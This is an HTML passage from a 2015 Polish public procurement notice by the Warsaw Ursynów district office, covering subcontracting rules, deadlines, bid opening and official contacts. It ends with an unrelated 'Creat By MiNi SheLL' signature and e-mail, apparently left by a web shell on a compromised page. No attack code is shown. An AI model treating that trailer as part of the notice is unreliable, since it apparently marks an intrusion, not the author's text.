-Zmiany albo rezygnacji z podwykonawcy z powodu zdarzeń, tj. rozwiązanie umowy łączącej go z Wykonawcą, jego likwidacja, nienależyta staranność stwierdzona przez Zamawiającego, z zastrzeżeniem iż jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust.2b, w celu wykazania spełniania warunków udziału w postępowaniu, opisanych w pkt 7.2. i 7.3. SIWZ, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> - osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr  336..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2015 godzina 11:00, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, WYDZIAŁ ADMINISTRACYJNO-GOSPODARCZY DLA DZIELNICY URSYNÓW, POK. NR 426 LUB WYDZIAŁ OBSŁUGI MIESZKAŃCÓW - PARTER URZĘDU.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Osobami ze strony Zamawiającego uprawnionymi do porozumiewania się z Wykonawcami są:

1) W zakresie dotyczącym przedmiotu zamówienia:
Pan Piotr Werewka- Kierownik Referatu Gospodarczego w Wydziale Administracyjno-Gospodarczym;
tel. 022/443-71-38  fax 022/ 443-71-35
Pan Paweł Włodarczyk - Główny specjalista w Delegaturze Biura Organizacji Urzędu w Dzielnicy Ursynów; 
tel. 022/443-73-15  fax 022/ 443-72-91
Pan Marek Wąchal - Główny specjalista w Wydziale Administracyjno-Gospodarczym i Informatyki 
tel. 022/545-73-35  fax 022/ 545-71-35
e-mail: mwachal@ursynow.pl;

2) W zakresie dotyczącym zagadnień formalno-prawnych
Pani Joanna Gawlik - Naczelnik Wydziału Zamówień Publicznych
tel: 22/ 443-73-31 fax: 22 / 443-73-32
Pani Iwona Glinka-Kuczyńska-Główny Specjalista w Wydziale Zamówień Publicznych
tel: 22/ 443-73-33 fax: 22 / 443-73-32
e-mail: zam_publ@ursynow.pl

2.Otwarcie ofert nastąpi w dniu 16.11.2015 r. o godz. 11:30 w siedzibie Zamawiającego przy  Al. KEN 61 w sali konferencyjnej - pok. nr 424

3.Zamawiający zastrzega, iż powierzenie podwykonawstwa może dotyczyć wyłącznie realizacji zadań określonych w pkt. 4.1. ppkt 10 i 11 SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com